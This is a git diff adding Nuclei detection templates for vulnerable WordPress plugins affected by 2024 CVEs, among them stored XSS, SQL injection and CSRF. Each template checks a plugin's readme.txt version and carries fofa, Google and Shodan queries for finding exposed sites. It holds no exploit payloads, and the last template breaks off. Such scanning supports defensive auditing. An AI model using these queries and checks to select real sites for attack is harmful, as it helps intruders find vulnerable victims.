type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "kredeum-nfts" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.6.9') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11877-22cf6fc826469df1501c9a0f0ba687ca.yaml b/poc/cve/CVE-2024-11877-22cf6fc826469df1501c9a0f0ba687ca.yaml new file mode 100644 index 0000000000..61c9171a21 --- /dev/null +++ b/poc/cve/CVE-2024-11877-22cf6fc826469df1501c9a0f0ba687ca.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11877-22cf6fc826469df1501c9a0f0ba687ca + +info: + name: > + Cricket Live Score <= 2.0.2 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Cricket Live Score plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'cricket_score' shortcode in all versions up to, and including, 2.0.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d9fe750f-5d8f-4c47-9d75-d928f1367fa8?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11877 + metadata: + fofa-query: "wp-content/plugins/cricket-score/" + google-query: inurl:"/wp-content/plugins/cricket-score/" + shodan-query: 'vuln:CVE-2024-11877' + tags: cve,wordpress,wp-plugin,cricket-score,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/cricket-score/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "cricket-score" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11879-59310d2dceea2163a5176b76507b44eb.yaml b/poc/cve/CVE-2024-11879-59310d2dceea2163a5176b76507b44eb.yaml new file mode 100644 index 0000000000..a3d18981de --- /dev/null +++ b/poc/cve/CVE-2024-11879-59310d2dceea2163a5176b76507b44eb.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11879-59310d2dceea2163a5176b76507b44eb + +info: + name: > + Stripe Donation <= 1.2.5 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Stripe Donation plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'stripe_donation' shortcode in all versions up to, and including, 1.2.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3a028937-38bb-4c28-aaa1-60a86124c998?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11879 + metadata: + fofa-query: "wp-content/plugins/bin-stripe-donation/" + google-query: inurl:"/wp-content/plugins/bin-stripe-donation/" + shodan-query: 'vuln:CVE-2024-11879' + tags: cve,wordpress,wp-plugin,bin-stripe-donation,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/bin-stripe-donation/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "bin-stripe-donation" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11883-4e04efa11f08a8fa78ba4ddbbc4a6849.yaml b/poc/cve/CVE-2024-11883-4e04efa11f08a8fa78ba4ddbbc4a6849.yaml new file mode 100644 index 0000000000..28dc3ec7f2 --- /dev/null +++ b/poc/cve/CVE-2024-11883-4e04efa11f08a8fa78ba4ddbbc4a6849.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11883-4e04efa11f08a8fa78ba4ddbbc4a6849 + +info: + name: > + Connatix Video Embed <= 1.0.5 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Connatix Video Embed plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'cnx_script_code' shortcode in all versions up to, and including, 1.0.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/89512190-a0fe-495a-9dda-8d8540a5325c?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11883 + metadata: + fofa-query: "wp-content/plugins/connatix-video-embed/" + google-query: inurl:"/wp-content/plugins/connatix-video-embed/" + shodan-query: 'vuln:CVE-2024-11883' + tags: cve,wordpress,wp-plugin,connatix-video-embed,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/connatix-video-embed/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "connatix-video-embed" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11884-55f612c1021e30ed6e11056cd7729031.yaml b/poc/cve/CVE-2024-11884-55f612c1021e30ed6e11056cd7729031.yaml new file mode 100644 index 0000000000..6608aef020 --- /dev/null +++ b/poc/cve/CVE-2024-11884-55f612c1021e30ed6e11056cd7729031.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11884-55f612c1021e30ed6e11056cd7729031 + +info: + name: > + Wp photo text slider 50 <= 8.1 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Wp photo text slider 50 plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wp-photo-slider' shortcode in all versions up to, and including, 8.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f98f11da-b0ae-4c00-9708-88d6044abda2?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11884 + metadata: + fofa-query: "wp-content/plugins/wp-photo-text-slider-50/" + google-query: inurl:"/wp-content/plugins/wp-photo-text-slider-50/" + shodan-query: 'vuln:CVE-2024-11884' + tags: cve,wordpress,wp-plugin,wp-photo-text-slider-50,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-photo-text-slider-50/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-photo-text-slider-50" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 8.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11888-153488a3d489b9c026a53628a1f85eb1.yaml b/poc/cve/CVE-2024-11888-153488a3d489b9c026a53628a1f85eb1.yaml new file mode 100644 index 0000000000..ecfb53fff5 --- /dev/null +++ b/poc/cve/CVE-2024-11888-153488a3d489b9c026a53628a1f85eb1.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11888-153488a3d489b9c026a53628a1f85eb1 + +info: + name: > + IDer Login for WordPress <= 2.1 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The IDer Login for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'ider_login_button' shortcode in all versions up to, and including, 2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/de602cf8-cc02-4459-aa23-5d8236048bca?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11888 + metadata: + fofa-query: "wp-content/plugins/ider-login/" + google-query: inurl:"/wp-content/plugins/ider-login/" + shodan-query: 'vuln:CVE-2024-11888' + tags: cve,wordpress,wp-plugin,ider-login,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ider-login/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ider-login" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11889-7b0c0efb6dca65612e5ac372a5bd0eb3.yaml b/poc/cve/CVE-2024-11889-7b0c0efb6dca65612e5ac372a5bd0eb3.yaml new file mode 100644 index 0000000000..b8ee751488 --- /dev/null +++ b/poc/cve/CVE-2024-11889-7b0c0efb6dca65612e5ac372a5bd0eb3.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11889-7b0c0efb6dca65612e5ac372a5bd0eb3 + +info: + name: > + My IDX Home Search <= 2.0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The My IDX Home Search plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'homeasap-idx-search' shortcode in all versions up to, and including, 2.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/172b6b54-d1de-48f9-ad2f-00d62d7e91fd?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11889 + metadata: + fofa-query: "wp-content/plugins/my-idx-home-search/" + google-query: inurl:"/wp-content/plugins/my-idx-home-search/" + shodan-query: 'vuln:CVE-2024-11889' + tags: cve,wordpress,wp-plugin,my-idx-home-search,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/my-idx-home-search/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "my-idx-home-search" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11894-88cc7cbdaa700b8fa41789611b2b65cf.yaml b/poc/cve/CVE-2024-11894-88cc7cbdaa700b8fa41789611b2b65cf.yaml new file mode 100644 index 0000000000..fc002e353a --- /dev/null +++ b/poc/cve/CVE-2024-11894-88cc7cbdaa700b8fa41789611b2b65cf.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11894-88cc7cbdaa700b8fa41789611b2b65cf + +info: + name: > + The Permalinker <= 1.8.1 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The The Permalinker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'permalink' shortcode in all versions up to, and including, 1.8.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d03dbe48-371f-4fb7-8902-a013338ac7d4?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11894 + metadata: + fofa-query: "wp-content/plugins/the-permalinker/" + google-query: inurl:"/wp-content/plugins/the-permalinker/" + shodan-query: 'vuln:CVE-2024-11894' + tags: cve,wordpress,wp-plugin,the-permalinker,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/the-permalinker/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "the-permalinker" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.8.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11910.yaml b/poc/cve/CVE-2024-11910.yaml new file mode 100644 index 0000000000..67278fbcd4 --- /dev/null +++ b/poc/cve/CVE-2024-11910.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11910-f64cb945375a031c726e01062aefcdec + +info: + name: > + WP Crowdfunding <= 2.1.12 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The WP Crowdfunding plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the wp-crowdfunding/search block in all versions up to, and including, 2.1.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b1541aaf-9f35-44b5-a985-1b8d33228f0a?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11910 + metadata: + fofa-query: "wp-content/plugins/wp-crowdfunding/" + google-query: inurl:"/wp-content/plugins/wp-crowdfunding/" + shodan-query: 'vuln:CVE-2024-11910' + tags: cve,wordpress,wp-plugin,wp-crowdfunding,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-crowdfunding/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-crowdfunding" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.12') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11911.yaml b/poc/cve/CVE-2024-11911.yaml new file mode 100644 index 0000000000..c4a84da7c0 --- /dev/null +++ b/poc/cve/CVE-2024-11911.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11911-faf718aed0ef166f0179212ee8a9f3c3 + +info: + name: > + WP Crowdfunding <= 2.1.12 - Missing Authorization to Authenticated (Subscriber+) WooCommerce Installation + author: topscoder + severity: low + description: > + The WP Crowdfunding plugin for WordPress is vulnerable to unauthorized plugin installation due to a missing capability check on the install_woocommerce_plugin() function action in all versions up to, and including, 2.1.12. This makes it possible for authenticated attackers, with Subscriber-level access and above, to install WooCommerce. This has a limited impact on most sites because WooCommerce is a requirement. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/972be091-64c4-4cb7-9563-70249c0db157?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-11911 + metadata: + fofa-query: "wp-content/plugins/wp-crowdfunding/" + google-query: inurl:"/wp-content/plugins/wp-crowdfunding/" + shodan-query: 'vuln:CVE-2024-11911' + tags: cve,wordpress,wp-plugin,wp-crowdfunding,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-crowdfunding/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-crowdfunding" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.12') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12015.yaml b/poc/cve/CVE-2024-12015.yaml new file mode 100644 index 0000000000..608f4ae2c8 --- /dev/null +++ b/poc/cve/CVE-2024-12015.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12015-a21eb9ced96f7c622c2eb418f1acf002 + +info: + name: > + WP Project Manager <= 2.6.16 - Authenticated (Project Manager+) SQL Injection + author: topscoder + severity: low + description: > + The WP Project Manager plugin for WordPress is vulnerable to SQL Injection via the 'orderby' parameter in the '/pm/v2/activites' route in all versions due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Project Manager-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c093ed6a-0f3d-4ad9-a57c-cec1c2e7bd8e?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.5 + cve-id: CVE-2024-12015 + metadata: + fofa-query: "wp-content/plugins/wedevs-project-manager/" + google-query: inurl:"/wp-content/plugins/wedevs-project-manager/" + shodan-query: 'vuln:CVE-2024-12015' + tags: cve,wordpress,wp-plugin,wedevs-project-manager,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wedevs-project-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wedevs-project-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.6.16') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12042.yaml b/poc/cve/CVE-2024-12042.yaml new file mode 100644 index 0000000000..85abf79aa1 --- /dev/null +++ b/poc/cve/CVE-2024-12042.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12042-d175dab1029fa17bfb46ec52ed2225e6 + +info: + name: > + MStore API – Create Native Android & iOS Apps On The Cloud <= 4.16.4 - Authenticated (Subscriber+) HTML File Upload (Stored Cross-Site Scripting) + author: topscoder + severity: low + description: > + The MStore API – Create Native Android & iOS Apps On The Cloud plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the profile picture upload functionality in all versions up to, and including, 4.16.4 due to insufficient file type validation. This makes it possible for authenticated attackers, with subscriber-level access and above, to upload HTML files with arbitrary web scripts that will execute whenever a user accesses the file. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/af468138-c10a-4f9b-b714-0425d52f0210?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2024-12042 + metadata: + fofa-query: "wp-content/plugins/mstore-api/" + google-query: inurl:"/wp-content/plugins/mstore-api/" + shodan-query: 'vuln:CVE-2024-12042' + tags: cve,wordpress,wp-plugin,mstore-api,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/mstore-api/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "mstore-api" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.16.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12300.yaml b/poc/cve/CVE-2024-12300.yaml new file mode 100644 index 0000000000..cfffb727ad --- /dev/null +++ b/poc/cve/CVE-2024-12300.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12300-fbca05b17c67e0a0b0725e51de7d84fc + +info: + name: > + AR for WordPress <= 7.3 - Missing Authorization to Unauthenticated Limited File Upload + author: topscoder + severity: high + description: > + The AR for WordPress plugin for WordPress is vulnerable to unauthorized double extension file upload due to a missing capability check on the set_ar_featured_image() function in all versions up to, and including, 7.3. This makes it possible for unauthenticated attackers to upload php files leveraging a double extension attack. It's important to note the file is deleted immediately and double extension attacks only work on select servers making this unlikely to be successfully exploited. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8b507369-49f7-4a1d-900b-c7bef40aec96?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 3.7 + cve-id: CVE-2024-12300 + metadata: + fofa-query: "wp-content/plugins/ar-for-wordpress/" + google-query: inurl:"/wp-content/plugins/ar-for-wordpress/" + shodan-query: 'vuln:CVE-2024-12300' + tags: cve,wordpress,wp-plugin,ar-for-wordpress,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ar-for-wordpress/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ar-for-wordpress" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 7.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12309.yaml b/poc/cve/CVE-2024-12309.yaml new file mode 100644 index 0000000000..b7ce81eea1 --- /dev/null +++ b/poc/cve/CVE-2024-12309.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12309-a66a88222b4d4522bfdbcfa49436df90 + +info: + name: > + Rate My Post – Star Rating Plugin by FeedbackWP <= 4.2.4 - Unauthenticated Voting On Scheduled Posts + author: topscoder + severity: medium + description: > + The Rate My Post – Star Rating Plugin by FeedbackWP plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 4.2.4 via the get_post_status() due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to vote on unpublished scheduled posts. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c9aa467f-9ac2-4a84-b0bb-761101733af7?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2024-12309 + metadata: + fofa-query: "wp-content/plugins/rate-my-post/" + google-query: inurl:"/wp-content/plugins/rate-my-post/" + shodan-query: 'vuln:CVE-2024-12309' + tags: cve,wordpress,wp-plugin,rate-my-post,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/rate-my-post/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "rate-my-post" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.2.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12411-f0a38e379813866e02459d465ef6affd.yaml b/poc/cve/CVE-2024-12411-f0a38e379813866e02459d465ef6affd.yaml new file mode 100644 index 0000000000..7bea6af802 --- /dev/null +++ b/poc/cve/CVE-2024-12411-f0a38e379813866e02459d465ef6affd.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12411-f0a38e379813866e02459d465ef6affd + +info: + name: > + WP Ad Guru – Banner ad, Responsive popup, Popup maker, Ad rotator & More <= 2.5.4 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The WP Ad Guru – Banner ad, Responsive popup, Popup maker, Ad rotator & More plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 2.5.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/aa9edf84-7ba0-488c-93ca-ed0b2ee435d5?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-12411 + metadata: + fofa-query: "wp-content/plugins/wp-ad-guru/" + google-query: inurl:"/wp-content/plugins/wp-ad-guru/" + shodan-query: 'vuln:CVE-2024-12411' + tags: cve,wordpress,wp-plugin,wp-ad-guru,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-ad-guru/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-ad-guru" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.5.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12414.yaml b/poc/cve/CVE-2024-12414.yaml new file mode 100644 index 0000000000..4a6c6d1581 --- /dev/null +++ b/poc/cve/CVE-2024-12414.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12414-86f1cff4a3be047a175aa262edd3a292 + +info: + name: > + Themify Store Locator <= 1.1.9 - Cross-Site Request Forgery + author: topscoder + severity: medium + description: > + The Themify Store Locator plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.9. This is due to missing or incorrect nonce validation on the setting_page() function. This makes it possible for unauthenticated attackers to modify the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/287abdef-24de-4e1b-a673-59cd37411bf6?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-12414 + metadata: + fofa-query: "wp-content/plugins/themify-store-locator/" + google-query: inurl:"/wp-content/plugins/themify-store-locator/" + shodan-query: 'vuln:CVE-2024-12414' + tags: cve,wordpress,wp-plugin,themify-store-locator,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/themify-store-locator/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "themify-store-locator" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.9') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12417.yaml b/poc/cve/CVE-2024-12417.yaml new file mode 100644 index 0000000000..c92a97d924 --- /dev/null +++ b/poc/cve/CVE-2024-12417.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12417-4592606a248f09bd9c69bf93e7bb5817 + +info: + name: > + Simple Link Directory <= 8.4.0 - Unauthenticated Arbitrary Shortcode Execution + author: topscoder + severity: medium + description: > + The The Simple Link Directory plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 8.4.0. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve 